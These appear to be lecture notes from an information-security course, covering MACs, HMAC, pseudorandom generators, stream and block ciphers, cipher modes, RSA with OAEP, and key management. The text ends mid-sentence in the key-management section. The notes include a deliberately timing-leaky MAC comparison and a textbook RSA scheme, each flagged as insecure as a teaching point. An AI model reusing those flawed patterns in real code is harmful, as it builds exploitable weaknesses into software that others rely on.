
Notes for COS 432 - Information Security∗

Contents
1 Message Integrity
   Sending messages
   Do PRF's exist?
   Cryptographic Hash Functions
   Timing Attacks
   Multiple Alice - Bob messages

2 Randomness
   Randomness as a system service
   Message Confidentiality
   Confidentiality and integrity

3 Block ciphers
   128-bit AES
   How to handle variable-size messages

4 Asymmetric key cryptography
   RSA algorithm
   Why not use public-key always?
   How to use public-key crypto
   Secure RSA

5 Key Management
   How big should keys be?
   Key management principles

6 Authenticating people
   Something you know: passwords
   Something you have
   Something you are

7 SSL/TLS and Public Key Infrastructure
   Observations on trust
   Another problem
   Attacks
   Public Key Infrastructure
   Certificates
   Naming and identity verification
   Anchoring
   Revocation

8 Access control
   Subjects and labels
   Traditional Unix File Access
   Capabilities
   Logic-based authorization

9 Information flow and multi-level security
   Lattice model
   Information flow in a program

10 Securing network infrastructure
   Prefix Hijacking
   How to defend?
   IP packet
   Ingress/egress filtering
   DNS attacks
   Prevention: DNSSEC
   Crypto and layers

11 Spam
   Economics of spam
   Anti-spam strategies

12 Web Security
   Browser execution model
   Cookies
   CSRF: Cross-Site Request Forgery
   Cross-Site Scripting (XSS)
   SQL injection

13 Web Privacy
   Third parties
   Tagging
   Fingerprinting
   More ways for websites to get your identity
   How security bugs contribute to online tracking
   Defenses

14 Electronic voting
   End-to-End (E2E) crypto voting
   El Gamal encryption method
   Reencryption in El Gamal
   In summary

15 Backdoors in crypto standards
   Data Encryption Standard (DES)
   DUAL-EC
   Digital Signature Standard (DSS)
   Backdoor-proof standardization

20 Big data and privacy
   How to achieve E-DP?
   Problems
   How to fix

21 Economics of Security
   Definitions of Efficiency
   Market Failures
   Solutions to Market Failures

22 Human Factors in Security
   Example: Wifi Encryption
   Case study: Email encryption ("Why Johnny Can't Encrypt")
   Social Barriers to Adoption
   Warning messages
   NEAT/SPRUCE Framework

23 Quantum Computing
   Classical Bits
   Quantum Bits (qubits)
   Multi-qubit systems
   Advantages of QC
   Implications for crypto
   Quantum Key Exchange

24 Password Cracking
   Elementary Methods
   Rainbow Tables

∗ This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International license. For details see https://creativecommons.org/licenses/by-nc/4.0/

1 Message Integrity

Sending messages
Alice --(m)--> Mallory --(?)--> Bob

Threat model: what the adversary can do and accomplish vs. what we want to do and accomplish. We generally assume that Mallory is malicious in the most devious possible way, as opposed to introducing random errors. In this case of Alice sending Bob a message:
• Mallory can see and forge messages
• Mallory wants to get Bob to accept a message that Alice didn’t send
• Alice and Bob want Alice to be able to send a message and have Bob receive it
in an untampered form.
CIA Properties
• Confidentiality: trying to keep information secret from someone
• Integrity: making sure information hasn’t been tampered with
• Availability: making sure system is there and running when needed (hardest to
achieve!)

In this problem, the goal is only integrity.

Role of stories in security:


• Pro: easy to follow
• Cons:
– In reality,“Alice/Bob” is a computer; for example, a server with no common
sense
– In reality, “Alice/Bob” is a person + computer (one may have some knowl-
edge that other doesn’t, e.g. knowledge divergence in phishing attack)
– We might be biased into rooting for one side or the other and lose impar-
tiality

What to send:

Alice --(m, f(m))--> Mallory --(a, b)--> Bob : Bob accepts a iff f(a) = b

where f is a Message Authentication Code (MAC)

Properties f needs to be a secure MAC:


1. deterministic (Bob needs to get the same answer that Alice got every time)
2. easily computable by Alice and Bob
3. not computable by Mallory (else Mallory can send (x, f (x)) for any x s/he wants)
Choosing f :
• Picking a secret function is risky because it is difficult to quantify how likely
Mallory will be able to guess the function.
• Use a random function...

input output
∅ 01011... ← 256 coin flips
0 101...
1 ...

“secure MAC game”: Us vs. Mallory


repeat until Mallory says “stop”: {
Mallory chooses xi
we announce f (xi )
}
Mallory chooses y ∉ {xi}
Mallory guesses f (y): wins if right

f is a secure MAC if and only if every efficient (polytime) strategy for Mallory
wins with negligible (probability that goes to 0) probability. In other words, f is
a secure MAC if Mallory can’t do better than random guessing.

Theorem. A random function is a secure MAC.


Intuition: Mallory asks to reveal certain entries, but for y Mallory is trying to
guess the result of the coin flips

• ...Or more practically, a pseudorandom function:


pseudorandom function (PRF): “looks random”, “as good as random”, prac-
tical to implement
typical approach:
– public family of function f0 , f1 , f2 , . . .
– secret key k which is, for example, a 256 bit random value
– use f (k, x)

Kerckhoffs’s principle:
Use a public function family and a randomly chosen secret key. Advantages:

1. can quantify probability that key will be guessed


2. different people can use the same functions with different keys
3. can change key if needed (if it’s given out or lost)

“PRF game” against Mallory:


we flip a coin secretly to get b ∈ {0, 1}
if b = 0, let g = random function
else, g = f (k, x) for random k
repeat until Mallory says “stop”: {
Mallory chooses xi
we announce g(xi )
}
Mallory guesses latest b: wins if right

f is a PRF if and only if every efficient strategy for Mallory wins with probability
less than 0.5 + ε, where ε is negligible.

Note: Mallory can always win by exhaustive search of the range of k in f (k, x),
so need to limit Mallory to “practical”

Theorem. If f is a PRF, then f is a secure MAC


Proof. By contradiction. There’s a reduction going on; we wanted to find a secure
MAC, which led us to wanting to find a secure PRF

What to send (new):

Alice --(m, f(k, m))--> Mallory --(a, b)--> Bob : Bob accepts a iff f(k, a) = b
Assumptions:
1. k is kept secret from Mallory
2. Alice and Bob have established k in advance
3. Mallory doesn’t tamper with the code that computes the function f (k, a)

Do PRF’s exist?

Answer: maybe; we hope so (some candidate functions haven't lost yet)

Here’s one: HMAC-SHA256

f(k, x) = S((k ⊕ opad) || S((k ⊕ ipad) || x))

where opad = 0x5c5c..., ipad = 0x3636... (note that || is concatenation) and S is SHA-256: start with a "compression function" C, taking 256 + 512 bits in and outputting 256 bits. The padded input is split into 512-bit blocks; starting from a fixed constant, each block is fed into C together with the previous 256-bit output, and the final 256-bit value is the output.
Note: SHA-256 by itself is subject to length-extension attacks, which is one reason HMAC uses this nested construction rather than S(k || x) directly.
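As an illustration (not part of the original notes), Python's standard hmac and hashlib modules implement this construction; the key and message values below are made up for the example.

    import hmac, hashlib

    key = b"k" * 32                      # a 256-bit shared secret k (example value)
    msg = b"pay Bob $100"

    # f(k, x): HMAC-SHA256 as the MAC
    tag = hmac.new(key, msg, hashlib.sha256).digest()

    # Bob recomputes the tag over what he received and compares;
    # compare_digest does the comparison in constant time
    ok = hmac.compare_digest(tag, hmac.new(key, msg, hashlib.sha256).digest())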

Cryptographic Hash Functions

They include MD5, SHA-1, SHA-2, etc.: functions that take arbitrary-size inputs and
return fixed-size outputs that are "hard to reverse." They are dangerous to use directly
because they don't have all the properties you think/want them to have.

Properties of a cryptographic hash function


1. Collision resistance:
Can't find x ≠ y such that H(x) = H(y)
2. Second preimage resistance:
Given x, can't find y ≠ x such that H(x) = H(y)
3. If x is chosen randomly from a distribution with high entropy, then given H(x),
you can’t find x
Better: use a PRF even if k is non-secret

Timing Attacks

Suppose Alice and Bob implement MAC-based integrity with the following code

    def macCheck(a, b, key):
        correctMac = Mac(key, a)             # recompute the correct MAC for message a
        for i in range(len(correctMac)):     # compare byte by byte...
            if correctMac[i] != b[i]:
                return False                 # ...returning as soon as a byte differs
        return True
The problem? The execution time depends on how many leading bytes of b are correct, because the loop returns at the first mismatch. Mallory may observe the runtime to gain information about the correct MAC.
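One standard fix (a sketch, not from the notes): compare the two MACs in constant time, so the running time is independent of where the first mismatch occurs. Mac() below is the same placeholder function as in the snippet above.

    import hmac

    def macCheck(a, b, key):
        correctMac = Mac(key, a)             # recompute the MAC, as above
        # hmac.compare_digest examines every byte no matter where the first
        # mismatch is, so timing doesn't reveal how many leading bytes matched
        return hmac.compare_digest(correctMac, b)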

Multiple Alice - Bob messages

How to deal with Mallory sending messages out of order or resending old messages
1. append sequence number to each message:
Alice sends m'_0 = (0, m_0), m'_1 = (1, m_1)
2. switch keys per message

2 Randomness
Best way to get a value that is unknown to an adversary is to choose a random value,
but it’s hard to get this in practice. Randomness (or a lack thereof) is often a weakness
in a security system.

Recall from last lecture that a PRF works as a MAC.


What is a PRF?

Two views:
1. family of functions fk (x)
2. function f (k, x). This is the view we’ll be using for this class.

True randomness:
• outcome of some inherently random process
• assume it “exists” but it’s scarce and hard to get
In security, "random" means unpredictable:
• to whom? E.g., in a PRF, the result can be considered random with respect to
someone who does not know the secret key.
• when?
Pseudorandom generator (PRG):
• takes a small "seed" of true randomness as input, e.g. a few coin flips, instead
of flipping a coin each time
• generates a long sequence of "good enough" values, i.e. unlimited pseudorandomness
• maintains "hidden state" that changes as the generator operates
• output is indistinguishable from truly random output in the practical sense, i.e.
an efficient party cannot distinguish them
• the generator needs to be deterministic, because if it is not it must be driven by
some kind of randomness, and the reason we are doing this is because randomness
is scarce
Randomness service:
• OS service, callable by application

Definition. PRG is secure if its output is indistinguishable from a truly random


value/string.
This is based on a game versus Mallory (can Mallory tell real randomness from PRG output?
similar to the PRF game from lecture 1), where secure means that Mallory wins with probability
at most 50% + ε, assuming Mallory has limited resources, where ε is negligible.

Seed --init--> S0 --advance--> S1 --advance--> S2   etc.
                ↓              ↓               ↓
             output0        output1         output2

Another desirable property is Forward Secrecy (backtracking resistance):


If Mallory compromises the hidden state of the generator at time t, Mallory can’t back-
track to reconstruct past outputs of the generator.

Note that if an adversary breaks in at time t, they can play it forward and see the
outputs at time t + x
Most PRGs are made up of an init function to initialize state S and an advance
function to step to a new state.

Example. A PRG that is not FS but is secure:


• Let f be a PRF
• init: (seed, 0)
• advance: (seed, k) → (seed, k + 1)
• output: f (seed, k)
If Mallory compromises the state (seed, k) at any point, she can decrement the counter and
recompute earlier outputs.

Example. A PRG that is FS and secure:


• Let f be a PRF
• init: seed
• advance: S → f (S, 0)
• output: f (S, 1)
This resists backtracking because the advance function relies on the PRF, and the seed
is overwritten

NOTE: The advance function should be performed after generating an output, and not
the other way around. If you do not advance after generating the output, the hidden
state that was used to generate the most recent output stays in memory. If at any time
between this and the next time you generate a new output the adversary is able to
compromise your system, they would learn the hidden state and be able to reconstruct
the last output (not backtracking resistant!).
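A minimal sketch of the forward-secure construction above, with HMAC-SHA256 standing in for the PRF f (my choice of primitive, not the notes'); it outputs first and then advances, as the note above prescribes.

    import hmac, hashlib

    def prf(k, x):                                   # f(k, x): HMAC-SHA256 as the PRF
        return hmac.new(k, x, hashlib.sha256).digest()

    class ForwardSecurePRG:
        def __init__(self, seed):                    # init: the state is just the seed
            self.state = seed

        def next_block(self):
            out = prf(self.state, b"\x01")           # output: f(S, 1)
            self.state = prf(self.state, b"\x00")    # advance: S -> f(S, 0); old S is gone
            return out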

Randomness as a system service

Hard parts: getting seed, recovering from compromise, even if we don’t know whether
the state has been compromised. We want to be continuously recovering because we
might not notice a compromise.
Create a new function, recover(S, randomdata) → state

Getting a good seed: want true randomness


• special circuit
• ambient audio/video: lava lamps! (lavarand)
problems: physical random processes are difficult in practice, not truly random (corre-
lations)

Alternate view: collect data unpredictable to adversary


• exact history of key presses
• exact path of mouse
• exact history of packet traffic
• periodic screenshot
• internal temperature
• ambient audio
Then: process to extract, or distill down to “pure” randomness - feed it all into a
PRF. If there’s enough randomness in input, output will be “pure random”. Can, for
example, use SHA256(all the data). SHA256 consumes data one block at a time, so
we don’t need to collect and store all the data; we can get/use the data iteratively.

Use this to:


• seed the system PRG

• recover/renew the state (mix fresh randomness in with hidden state) using PRF,
to re-establish secrecy of hidden state

NOTE: It is a mistake to mix in a single bit at a time, since Mallory can keep up by
tracking 2 possibilities at each step; but if we wait until we have a lot, say 256 bits of
randomness, then Mallory can't keep up (2^256 possibilities), even if she knows the
algorithm used.
Hard to estimate actual amount of entropy in pool, so wait for too much randomness
before mixing to remain conservative.
There’s also a problem with “headless” machines, like servers, that don’t have enough
areas of randomness to draw from.
Linux:
• /dev/random gives pure random bits, but have to wait
• /dev/urandom is output of PRG, renewed via “pure” randomness
The boot problem: At startup,
• least access to randomness (system is clean)
• highest demand for randomness (programs want keys)
Solutions (with their problems):
• save some randomness only accessible at boot:
hard to tell that this hasn’t been observed, or used on last boot
• connect to someone across network to give pseudorandomness:
want secure connection but don’t yet have key (okay if have just enough for that
key, or semi-predictable and hope Mallory doesn’t guess)

Message Confidentiality

Now we may have a (passive) adversary/eavesdropper Eve who can only listen:

Alice → Bob
  ↓
 Eve

Message processing:
plaintext → E (encrypts) --ciphertext--> D (decrypts) → plaintext
               ↑                              ↑
             key k                          key k

Goal: ciphertext does not convey anything about plaintext. Bob can recover text, Eve
cannot.
Semantic Security
“Encryption game” against Eve:

Allow Eve to pick pieces of plaintext; we provide encryptions E_k(x_i) until she is satisfied
Eve chooses two pieces of plaintext
We flip a coin and encrypt one of them
Eve guesses which was encrypted: wins if right

We say that the encryption method is secure if Eve can't do better than random
guessing (50/50) plus a negligible ε. This is known as semantic security.

Note: if we were being more rigorous in our definitions, we would use a stronger defi-
nition of security for encryption here so that it’s easier to combine later with integrity.
However, the methods we are learning are secure by any of the definitions.

First approach: one-time pad (known to be semantically secure)


1. Alice and Bob jointly generate a long random string k (“the pad”)
2. E(k, x) = k ⊕ x
3. D(k, y) = k ⊕ y = k ⊕ (k ⊕ x) = (k ⊕ k) ⊕ x = x
Problems:
1. can’t reuse key:
(k ⊕ a) ⊕ (k ⊕ b) = a ⊕ b
worst case, Eve knows one message, but even knowing that the messages are say
English text can give Eve information from character distributions
2. need really long key – needs to be as long as sum of message lengths
Idea: use a PRG to “stretch” a small key (called a “stream cipher”)
• Start with a fixed-size random k, add a "nonce": unique (i.e. don't reuse a nonce
value) but not secret. Use PRF(k, nonce) to seed a PRG.
• Alice and Bob run identical PRGs in parallel with same key
• xor messages with PRG’s output
• Do not re-use (key, nonce) pair
This approach still does not provide integrity.
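A sketch of this stream-cipher idea, with HMAC-SHA256 run in counter mode playing the role of the PRF-seeded PRG (the function names and layout are mine, not the notes'):

    import hmac, hashlib

    def keystream(key, nonce, length):
        # concatenate PRF(key, nonce || counter) blocks into a keystream
        out = b""
        counter = 0
        while len(out) < length:
            block = nonce + counter.to_bytes(8, "big")
            out += hmac.new(key, block, hashlib.sha256).digest()
            counter += 1
        return out[:length]

    def stream_encrypt(key, nonce, plaintext):       # decryption is the same operation
        ks = keystream(key, nonce, len(plaintext))
        return bytes(p ^ k for p, k in zip(plaintext, ks))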

Confidentiality and integrity

A few approaches:
1. MAC-then-encrypt: E(x || M(x))   (SSL/TLS)
2. Encrypt-then-MAC: E(x) || M(E(x))   (IPsec)  **This is the winner (because math).
3. Encrypt-and-MAC: E(x) || M(x)   (SSH)

Theorem 2.1. If E is a semantically secure cipher, and M is a secure MAC, then #2


is secure.
Encrypt plaintext, then append MAC: Bob first integrity checks, then decrypts. Note
that we need to use separate keys for confidentiality and integrity, and a separate set
of two keys for reverse channel (Bob to Alice).

If we have only one shared key, we seed the PRG with the shared key and then use
four values it produces for the message sending.
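A sketch of approach 2 (encrypt-then-MAC), reusing stream_encrypt() from the previous sketch and HMAC-SHA256 as the MAC; the exact message layout is my choice:

    import hmac, hashlib

    def protect(k_enc, k_mac, nonce, plaintext):
        c = stream_encrypt(k_enc, nonce, plaintext)                  # E(x), confidentiality key
        tag = hmac.new(k_mac, nonce + c, hashlib.sha256).digest()    # M(E(x)), integrity key
        return nonce, c, tag

    def unprotect(k_enc, k_mac, nonce, c, tag):
        expected = hmac.new(k_mac, nonce + c, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):                   # check integrity first
            raise ValueError("MAC check failed")
        return stream_encrypt(k_enc, nonce, c)                       # then decrypt (D = E)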

3 Block ciphers

Story from WWII:


Pacific war: lots of radio communications; crypto and US decryption efforts played a huge role
Admiral Nimitz had advantage of code break giving Japanese battle plan (Battle of
Midway)
Most successful code was used by the US Marines: the Navajo language served as a
code by translating the first letter of an English word into a Navajo word and sending
that by radio (allowed speech communication).
Even when they got a Navajo speaker, the Japanese were unable to usefully decrypt
these messages.

Last time: Stream ciphers

E(k, m) = D(k, m) = PRG(k) ⊕ m

Alternative approach: Block ciphers


Start with function that encrypts a fixed-size block of data (and fixed-size key) and
build up from there
• may run faster
• many PRGs work this way anyway
Note that a block cipher is not the same thing as a PRF, since a PRF may have no
inverse (∃ x1 ≠ x2 s.t. f(k, x1) = f(k, x2)).
Want: pseudorandom permutation (PRP)
• function from n-bit input (plus key) to n-bit output
• if x1 ≠ x2, then f(k, x1) ≠ f(k, x2)
• pseudorandom as expected from previous definitions – should be indistinguishable
from truly random to an adversary
It is useful to compare the different types of security functions we have seen. Note:
Can use any of PR function/permutation/generator to build the other two.

Property     PR Functions          PR Permutations   PR Generators   Hash Functions

Input        Any                   Fixed-size        Fixed-size      Any
Output       Fixed-size            Fixed-size        Any             Fixed-size
Has Key      Yes                   Yes               Yes             No
Invertible   No                    With key          No              Depends
Collisions   Yes, but can't find   No                No              Yes, but can't find

Challenge: design a very hairy function that’s invertible, but only by someone who
knows the key. A PRP will have this property.

Minimal properties of a good block cipher:


• efficient
• highly nonlinear (“confusion property”) - hard for adversary to invert
• mix input bits together (“diffusion”) - every input bit affects the output
• depend on the key
How to get these properties: a Feistel network, given that f is a PRF.

    plaintext = left half || right half
    one "Feistel round" with key k0:   (L, R) → (R, L ⊕ f(k0, R))
    another round with key k1, and so on, alternating which half goes through f

Add as many rounds as you want, alternating left and right rounds.

Why? Easy to invert since each round is its own inverse, so inverse of series of rounds
is the same series in reverse order. This makes it so that f can be as difficult as we
want and the process is still invertible, so why not make f a PRF?

Theorem. If f is a PRF, then a 4-round Feistel network is a PRP.


Often use weaker rounds (which may be faster to compute), but more of them.
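A sketch of a Feistel network over even-length byte blocks, with truncated HMAC-SHA256 standing in for the round function f (an assumption for illustration, not the notes' choice):

    import hmac, hashlib

    def f(k, half):                                    # round function: a PRF
        return hmac.new(k, half, hashlib.sha256).digest()[:len(half)]

    def xor(a, b):
        return bytes(x ^ y for x, y in zip(a, b))

    def feistel_encrypt(round_keys, block):
        mid = len(block) // 2
        left, right = block[:mid], block[mid:]
        for k in round_keys:                           # (L, R) -> (R, L xor f(k, R))
            left, right = right, xor(left, f(k, right))
        return left + right

    def feistel_decrypt(round_keys, block):
        mid = len(block) // 2
        left, right = block[:mid], block[mid:]
        for k in reversed(round_keys):                 # same rounds, reverse key order
            left, right = xor(right, f(k, left)), left
        return left + right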

Example. DES (Data Encryption Standard)


• block size = 64 bits
• 56-bit key
• Feistel network - 16 (weak) rounds
History:
• designed in secrecy by IBM and the NSA
• adopted as a US government standard in 1977

• private sector followed


Backdoor known to designers but not public? Concerns by public over the source -
history of US offering other governments intentionally weak ciphers
The reason for secrecy around the design was classified knowledge: they wanted to make
DES secure against differential cryptanalysis, but that technique wasn't publicly known
yet and the NSA wanted to keep using it against others.
Designed to be slow in software, to discourage software implementations.
Key size problem:
2^56 steps for a brute-force search to recover an unknown key, which is currently
feasible, though it wasn't at the time (except maybe by the NSA?)
This can be addressed by iterating DES with multiple keys. Note that you need to do
this three times (triple DES) to get 2^112 for a brute-force search, because of the
meet-in-the-middle attack on double encryption.

Example. AES (Advanced Encryption Standard) Probably the best available today,
coming from overcoming drawbacks of DES
• software efficiency a goal
• large, variable key size (128-, 192-, 256-bit variants)
• open, public process for choosing and generating the cipher
run by NIST as a design contest judged on pre-determined criteria
2000 – NIST chose Rijndael (Belgian designers)

128-bit AES

• 128-bit input, output, and key


• not feistel design
• lookup table public
• ten rounds (generally cryptanalysis is a small-round break and then extending
the tactic to a full number of rounds, so use a safe number then add extra rounds
for safety buffer), each with four steps
1. non-linear step (“confusion”):
run each byte through a certain non-linear function (lookup table of a per-
mutation)
2. shift step (“diffusion”):
think of 128-bits as 4x4 array of bytes: shift the ith row left i steps; values
that fall off wrap around the same row. (circular shift)
spreads out columns
3. linear mix (“diffusion”):
take each column, treat as 4-vector and multiply by a certain matrix (spec-
ified in standard)
mixes within column
4. key-addition step (key-dependent):
xor each byte with corresponding byte of the key
Note: the key expansion could be a source of weakness (to get the ten keys
needed from one)
• to decrypt, do inverses in reverse order

How to handle variable-size messages

Problems:
• padding - plaintext not a multiple of blocksize
• “cipher modes” - dealing with multi-block messages
Padding: most important property needs to be that recipient can unambiguously tell
what is padding and what is not

Good method: append the bits 10* until you reach the end of the block (to unpad, pull off
all the 0's at the end, then the 1). Remember that you must add some padding (at least one
bit) to every message, even one that already fills a block. This works similarly with bytes.
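A byte-oriented sketch of the 10* rule (append one 0x80 byte, then zero bytes to fill the block; unpadding strips trailing zeros and then the marker):

    def pad(msg, block_size=16):
        padded = msg + b"\x80"
        return padded + b"\x00" * (-len(padded) % block_size)

    def unpad(padded):
        stripped = padded.rstrip(b"\x00")      # pull off all 0 bytes at the end...
        assert stripped.endswith(b"\x80"), "bad padding"
        return stripped[:-1]                   # ...then the single 0x80 marker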

Cipher modes: encrypt multi-block messages


• ECB (Electronic Code Book) !! BAD - not semantically secure - do not use !!

Ci = E(k, Pi )

Same plaintext results in same ciphertext – leaks information to adversary


• CBC (Cipher Block Chaining): Common, pretty good
“strawman CBC”, Ri random

Ci = (Ri, E(k, Ri ⊕ Pi))

Good, but doubles message size


Idea: use Ci−1 instead of Ri

Ci = E(k, Ci−1 ⊕ Pi )
What about the first block? Generate a random value, the “initialization vector
(IV)”, to prepend to message to serve as C−1 . Don’t want to reuse with same
key, or adversary could compare the first block of the ciphertext to see if same
plaintext, but random-ish generation good enough, and can use same key over
and over.
• CTR (Counter mode): Generally agreed on as best to use. Similar to a stream
cipher.
Ci = E(k, messageid||counter) ⊕ Pi
messageid must be unique, then it’s okay to reuse key.
Note: this would not be forward secret as a PRG.
Reasons to use CTR over PRG: more efficient on commodity hardware and per-
haps you trust AES more than your PRF (even though you can’t prove it either
way).
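A sketch of CTR mode; a real implementation would use AES as E, but to stay self-contained this sketch uses truncated HMAC-SHA256 as a stand-in block-sized function (CTR only uses E in the forward direction, so a PRF works for the sketch):

    import hmac, hashlib

    BLOCK = 16

    def E(k, block):                       # stand-in for one-block AES encryption
        return hmac.new(k, block, hashlib.sha256).digest()[:BLOCK]

    def ctr_encrypt(k, message_id, plaintext):        # decryption is the same operation
        out = bytearray()
        for i in range(0, len(plaintext), BLOCK):
            counter = (i // BLOCK).to_bytes(8, "big")
            ks_block = E(k, message_id + counter)      # E(k, messageid || counter)
            out += bytes(p ^ s for p, s in zip(plaintext[i:i + BLOCK], ks_block))
        return bytes(out)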

4 Asymmetric key cryptography


Symmetric key: use the same key to encrypt and decrypt
Problems:
• Integrity: Alice sending to Bob, Charlie, Diana, ...
If Alice, Bob, Charlie, and Diana all have key k, then Bob could compute a MAC on a
message and deliver it to Charlie and Diana, thereby forging a message from Alice.
It would be nice if Alice were the only one who could send a verified message,
without needing a separate integrity key per recipient.
• Confidentiality: maybe only Alice should be able to decrypt a message
Asymmetric scheme: 1976, Diffie-Hellman (discovered earlier in secret by Cocks and colleagues at GCHQ for the British military)
• One key for encrypting, another for decrypting
• One key for MAC, another for verifying it

Definition. “public-key” cryptography


Almost always:
• Generate key-pair such that can’t derive one key from the other
• One key is kept private (only Alice knows it)
• Other key is public (everyone knows it)


RSA algorithm

** We implemented this in hw2 **


• Best-known, most used public key algorithm
• 1978, Rivest-Shamir-Adleman
How it works:
To generate an RSA key pair,
1. Pick large secret primes p, q (randomly chosen, typically 2048 bits)
Done by generating odd numbers in range and testing if prime, throwing away
if not prime and trying again. Primes are dense enough that this isn’t too bad,
and primality testing is also okay in terms of time.

2. Define N = pq
Useful fact (Euler's theorem): if p, q are prime, then for all 0 < x < pq with x relatively prime to pq,

x^((p−1)(q−1)) mod pq = 1

3. Pick e such that 0 < e < pq, e relatively prime to (p − 1)(q − 1)


4. Find d such that ed mod (p − 1)(q − 1) = 1. You can use the extended Euclidean
algorithm to find d.
The public key is (e, N ) and the private key is (d, N ) [+(p, q)].
To encrypt or decrypt with the public key:

RSA((e, N), x) = x^e mod N

To encrypt or decrypt with the private key:

RSA((d, N), x) = x^d mod N

Theorem. “It works”

Proof.

RSA((e, N), RSA((d, N), x))
  = (x^d mod pq)^e mod pq
  = x^(de) mod pq
  = x^(a(p−1)(q−1)+1) mod pq, for some a
  = (x^((p−1)(q−1)))^a · x mod pq
  = (x^((p−1)(q−1)) mod pq)^a · x mod pq
  = 1^a · x mod pq
  = x mod pq
  = x, given 0 < x < pq

Best known attack is to try factoring N to get p, q
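A toy sketch of textbook RSA with tiny primes (hopelessly insecure as-is; real keys use primes hundreds of digits long and the OAEP preprocessing described below):

    p, q = 61, 53                      # toy secret primes
    N = p * q                          # N = 3233
    phi = (p - 1) * (q - 1)
    e = 17                             # relatively prime to (p-1)(q-1)
    d = pow(e, -1, phi)                # modular inverse via Euclid (Python 3.8+)

    x = 42                             # a message, 0 < x < N
    c = pow(x, e, N)                   # RSA((e, N), x) = x^e mod N
    assert pow(c, d, N) == x           # RSA((d, N), c) = c^d mod N recovers x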

Why not use public-key always?

• It’s slow (∼1000x slower than symmetric); you’re exponentiating huge numbers
• Key is big (∼4k bits)

How to use public-key crypto

For confidentiality: (“your eyes only”)


• Encrypt with public key
• Decrypt with private key
For integrity: (“digital signature”)
• “Sign” by encrypting with private key
• “Verify” by decrypting with public key

Secure RSA

!! Warning: Not secure as described above, need to fix !!

Problem 1:
Suppose (e, N) = (3, N). Given ciphertext 8 that was encrypted with (3, N), it's trivial
to see that x^3 mod N = 8 has solution x = 2 (the cube never "wrapped around" mod N).
This shows that you may run into trouble when encrypting small messages.

Problem 2 (Malleability):

RSA((d, N), x) · RSA((d, N), y) mod N = (x^d mod N)(y^d mod N) mod N
                                      = (xy)^d mod N
                                      = RSA((d, N), xy)

RSA((d, N ), xy) is the signature for the message xy! Adversary could use this to win
the game defining security of the cipher

Definition. Malleability
Adversary can manipulate ciphertext, get predictable result for decrypted plaintext.
This is usually bad, but sometimes we want a malleable cipher (for some application)


Lesser problems:
• Same plaintext results in same ciphertext (deterministic)
• No built-in integrity check

To solve all these problems, add a preprocessing step before encryption. The standard
way is called OAEP (Optimal Asymmetric Encryption Padding):
1. Generate 128 bit random value, run through PRG G
2. XOR with message padded with 128 bits of zeros
3. Run result through PRF H, a hash function with announced key
4. XOR with the random bits
5. Concatenate result and send to RSA encyption
  message | 000... (128 bits)           random (128 bits)
       ↓                                     ↓
       ⊕  ←−−−  G  ←−−−−−−−−−−−−−−−−−−−−−−−−−+
       ↓                                     ↓
       +−−−−−→  H  −−−−−−−−−−−−−−−−−−−−−−−→  ⊕
       ↓                                     ↓
                 to RSA encryption

Also add the reverse as a postprocessing step after decryption:


                 from RSA decryption
       ↓                                     ↓
       +−−−−−→  H  −−−−−−−−−−−−−−−−−−−−−−−→  ⊕
       ↓                                     ↓
       ⊕  ←−−−  G  ←−−−−−−−−−−−−−−−−−−−−−−−−−+
       ↓                                     ↓
    m′ | z′                                  r′

Reject if z′ is not all zeros; otherwise throw away r′ and let m′ be the result of the
decryption. m′ should at this point be equal to the original message.
Other things to clean up:
• Key size
– To get a big enough key space, need lots of possible primes
– Factoring is better than brute force
– Factoring algorithms might get better, so build in cushion in key size to
account for incremental improvements in these algorithms.

– Today, 2048-bit primes seem okay


• Useful performance trick
– e = 3 and make sure p and q are chosen such that 3 is relatively prime to
p − 1 and q − 1
– This is extra-big win for digital signatures since verify is the common case.
– But: what if OAEP disappears from your code?
Use e = 65537 = 2^16 + 1 instead
• Hybrid crypto: To encrypt a large message,
– Generate random symmetric key k
– Encrypt k with RSA
– Encrypt message with k
Sometimes share the symmetric key using RSA and use that to generate further
keys to avoid using public-key crypto more than necessary
• Hybrid digital signatures: RSA sign(Hash(message))
• Claimed identities
Suppose we get a message from “Alice” with a digital signature md mod N . We
can verify using (md mod N )e mod N , but how can we be sure of Alice’s public
key if we don’t know Alice?
Use a digital certificate ("cert"):
– Bob signs a message saying “Alice’s public key is (...)”
– This works if we know Bob and believe him to be trustworthy and competent.
– If we don't know Bob, then we need to ask Charlie if Bob is trustworthy
and competent.
– But if we don’t know Charlie...
– Most common solution: pick universally trustworthy “certificate authority”
who gives out keys

There is also the Web of Trust approach


– Everybody certifies their friends, and if you can find a mutual friend, you’re
good and people will trust you.

5 Key Management

US for a long time put restrictions on export of cryptographic software, the same
restrictions as munitions, requiring a special license.
Java, for example, would have liked to include crypto along with runtime libraries but
hard to get license. Possible solutions:
• plugin architecture: could plug-in if they have their own
• designed libraries in a way convenient for people who want to implement their own
crypto (export a general-purpose math library without the export-control issues)

How big should keys be?

A key should be so big an adversary has negligible chance of guessing it.


• Watch out for Moore’s law: Computers double in speed every 18 months. So,
you need to add one more bit every 18 months.
• For symmetric ciphers, 128 bits is plenty: 2^128 ≈ 3 × 10^38, so at 1 trillion guesses per
second an exhaustive search takes about a billion times the age of the universe.
• Need larger for PRF/hash: suppose we're using one for a digital signature; then we're
in trouble if the adversary finds a "collision" (x1 ≠ x2 s.t. H(x1) = H(x2)). Finding
a collision is more efficient than finding the key.
"Birthday attack":
Generate 2^(b/2) items at random and look for collisions in that set (b is the bit-length
of your hash). Odds of a collision are ∼50%.
The attack requires O(2^(b/2)) time and O(2^(b/2)) space, and is also possible in constant space.
People have generated fraudulent digital certificates by exploiting such collisions.
Upshot: PRF output size is typically 2x cipher output size to be safe (256 bits)

Key management principles

0. Key management is the hard part


1. Keys must be strongly (pseudo)random
2. Different keys for different purposes (signing/encrypting, encrypting vs MACing,
Alice to Bob vs Bob to Alice, different protocols)
3. Vulnerability of a key increases

• the more you use it


• the more places you store it
• the longer you have it
So change keys that get “used up”, and use “session keys”. If Alice and Bob
share a long-term key, generate a fresh key just for now and use the long-term
key to “handshake” and agree on which fresh key to use.
4. The hardest key to compromise is one that’s not in accessible storage (e.g. a key
that’s in a drive locked in a safe or stored offline).
5. Protect yourself against compromise of old keys (forward secrecy); destroy keys
when you’re done with them (and keep track of where the keys are)
For example, it’s bad if Alice tells Bob, ”Here’s our new key, encrypted under
the old key.” If Mallory records this message and later breaks the old key, she
now can also get the new key.
Diffie-Hellman key exchange (D-H): 1976
Like RSA, it relies on a hardness assumption. Here, we rely on hardness of the "discrete log"
